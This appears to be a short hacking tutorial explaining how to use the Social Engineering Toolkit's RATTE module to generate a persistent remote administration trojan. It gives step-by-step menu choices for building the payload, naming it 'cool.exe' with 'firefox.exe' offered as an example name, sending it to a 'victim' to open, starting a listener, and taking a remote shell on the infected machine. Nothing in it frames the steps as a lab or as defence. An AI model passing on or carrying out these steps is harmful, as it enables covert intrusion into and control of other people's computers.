How to use R.A.T. through S.E.T?

RAT is Remote Administration tool , using RAT you can control Remote P.C. ,there are lots of software available for RAT , but they are made from hackers, there is possibility of back-door in that readily available software. So today we use RAT through Social engineering toolkit(SET).

(1)Open your terminal & type

cd /opt/set


(2)update your set

(3)Now select option 3 which is Third party Modules

(4)Now select option 2 which is RATTE (Remote administration tool tommy edition).

(5)Enter I.P. Address of your computer to connect back

(6)Port RATTE Server should listen on [8080]: press enter

(7)Should RATTE be persistent [no|yes]?:yes

(8)Use specifix filename (ex. firefox.exe) [filename.exe or empty]?:cool.exe

(9) Payload has been exported to src/program_junk/ratteM.exe

(10)Now send your ratteM.exe files to victim, as soon as they download and open it

Start the ratteserver listener now [yes|no]:yes

(11)chose 1 option which is list client

(12)if the payload been executed successfully, then you will see a new session and the client details. Note down the session number. Enter the session you want to interact with:press 0 here

Now choose option2 “activate client”

Now you get menu with lots of menu. Select 1st option which is start shell.

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